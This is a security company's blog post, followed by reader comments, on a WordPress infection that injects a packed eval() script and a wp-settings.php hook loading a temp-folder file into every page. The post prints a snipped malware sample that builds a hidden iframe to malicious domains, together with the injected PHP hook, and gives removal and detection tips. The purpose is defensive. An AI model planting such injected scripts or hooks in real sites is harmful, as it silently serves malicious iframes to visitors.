• nl.ai p,a,c,k,e,d Malware

    Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

    One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

    The malware
    Usually the malware shown below will appear at the top of the page in the section of a webpage. Please check your source code.

    Malware sample:

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){
    ...snipped..
    t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
    </script>
    

    Steps to remove the malware

    1. Access your hosting account SSH or SFTP
    2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )
    3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory
    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . ‘/wp_inc’)){
    readfile($t_d . ‘/wp_inc’);
    }
    }
    add_action(‘wp_head’, ‘check_wordpress’);
    do_action( ‘init’ );
    

    What does the malware do?
    Th injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

    Malware destination sites:

    hxxp://juyfdjhdjdgh.nl.ai/showthread.php
    hxxp://myftp.org/
    hxxp://coom.in/
    

    How did this happen?
    One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

    Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…

    • I’ve been hit with this one, apparently on several of my sites, so FTP access is suspected.

      Did find the suspect code in my wp-settings.php file.

      Unable to locate anywhere on the server: wp_inc/upd.php file in your /tmp folder or in your wordpress install

      Is this file always present?

      Thanks so much!

      Posted by Bill Alpert on November 7th

    • yes, in the samples we have seen, these files are present. You can try to search for “Base64” in the files on your hosting account to help you locate the malware files. Try to use grep/Wingrep to search for this pattern.

      Posted by anirban on November 7th

    • […] Vu sur cette article : http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/ […]

      Posted by Wordpress Malware ou comment se faire hacker son site | L'Actu chez MozArtsduWeb on November 8th

    • i found the function in wp-settings but can’t locate the “eval…”

      Posted by crovinz on November 8th

    • thats ok, just try to clean your wp-settings and locate wp_inc or other files that might contain Base64_ in them, use grep/wingrep. Remove the malware code with the p,a,c,k,e,d in it anyways.

      Posted by anirban on November 8th

    • I’ve been hit by this one across 4 of my site, infact the only site that is clear used Disqus for comments. I also didn’t find the wp_inc/upd.php file. The malware was in revisions-js.php and in cforms.js (from the Cforms plugin.
      The check wordpress function was on my unaffected site , so should I be removing this bit of code or is it actually part of WordPress?

      Posted by Mark T on November 9th

    • If your check wordpress function seems to be pulling in revisions-js.php or some other file then you have to clean it up.

      Posted by anirban on November 9th

    • also try to search for eval(base64_decode, shell_exec, passthru, you might find hidden scripts inside your install

      Posted by anirban on November 9th

    • Hi, Thanks for your guide on this, i too have been a victim and and suspect it was through storing my FTP detials in FileZilla. Also as with Mark T I didn’t find wp_inc/upd.php files but it was in the revisions-js.php . Maybe worth adding this to your removal guide.

      Passwords all changed and deleted the account settings from FileZilla, hopefully I’m all safe again! Thank you very much for this guide or I would have been stumped!

      Cheers! John

      Posted by John on November 11th

    • […] WordPress and FileZilla users beware! Theres a new malware doing the rounds that injects code into to your WP files. Not the easiest to move or detect how ever there is an axcellent guide here on how to do so: http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/. […]

      Posted by John's Stuff | nl.ai p,a,c,k,e,d Malware on November 11th

    • I followed the instructions but strangely my sidebar disappeared. Does anyone know how to get that back?

      Posted by JT on November 24th

    • That’s right, the file is here for many folks: wp-admin/js/revisions-js.php

      Posted by L on November 25th

    • I was unable to find the code in either of those places. I have also heard that it can be in the wp-config.php but did not find it there ase well.

      Do you have any other suggestions?

      Posted by Mike on November 25th

    • Use grep/wingrep to search in the template files. Some users are reporting templates as harboring this malware.

      Posted by anirban on November 30th

    • Not always, but with a high degree of confidence. Some users have reported not being able to find it. It could be that your hosting company tried to do a clean up without letting you know specifically.

      Posted by anirban on November 30th

    • Great post and thanks a million for the info. I have been working for a week trying to fix this problem.

      I finally found the base64_decode portion in the Index.php files, but I haven’t been able to find the other portion.

      I am worried that without removing the other portion, the code will just come back.

      I can’t find the wp_inc/upd.php file and the revisons is clear. Has anyone else found another location for the second portion.

      Thanks for any help, this has been one nasty hack that has been a pain in my a** for a week.

      Posted by Eric on December 9th

    • @Eric
      I downloaded my complete website to a folder on my pc and then string-searched the files(with a multiple-file string finder program) for the “p,a,c” string. Found 4 scripts that I was able to delete from my server.
      Do note however, that some of the ‘good’ WP plugins also use Dean Edward’s packing function – so remember to only delete the ‘bad ones’.

      Posted by John on December 13th

    • I got hit with this across about 3dozen sites, some without WP. It added the script p,a ,c,k…etc clearly to index.HTML files. And Also added a weird line of backwards code following the opening <?php tag
      Spent 3 hours yesterday cleaning all that out and today it's all back!

      So I believe something is attached somewhere to something and getting in thru my FTP client
      So cleaning that problem from my machine seems paramount

      Ran macafee, spybot, working on Will run AVG next
      Any idea where to look specifically?

      And PS thanks for this info

      Thanks

      Posted by Kerchmcc on January 2nd

    • Unfortunately, the variety of password sniffing trojans is pretty large so it is hard to provide an educated answers without knowing the details of the system that was compromised. Trojans can range from simple exe drops placed in system32 folders (on PCs) to sophisticated rootkits and RATs. I would definitely suggest moving away from FTP altogether and trying SFTP/SCP/SSH as a better way to upload your files to your hosting account. Also, please avoid storing any FTP passwords on your local machine, especially inside local FTP clients (Filezilla etc..)

      Posted by anirban on January 5th